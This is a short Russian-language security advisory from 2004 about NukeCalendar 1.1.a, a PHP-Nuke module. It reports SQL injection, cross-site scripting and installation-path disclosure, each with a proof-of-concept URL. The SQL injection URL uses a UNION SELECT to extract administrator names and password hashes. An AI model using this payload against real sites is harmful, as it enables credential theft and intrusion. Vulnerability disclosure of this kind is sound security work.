Security Lab

Несколько уязвимостей в NukeCalendar

Дата публикации:11.04.2004
Всего просмотров:1118
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: NukeCalendar 1.1.а

Описание: Несколько уязвимостей обнаружено в NukeCalendar. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.

1. SQL injection:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=vie w&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null
2. XSS
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
3. Раскрытие инсталляционного пути:
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

URL производителя: http://vkp.shiba.de/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=19&ttitle=nukeKalender%201.1.a

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: waraxe-2004-SA#015 - Multiple vulnerabilities in NukeCalendar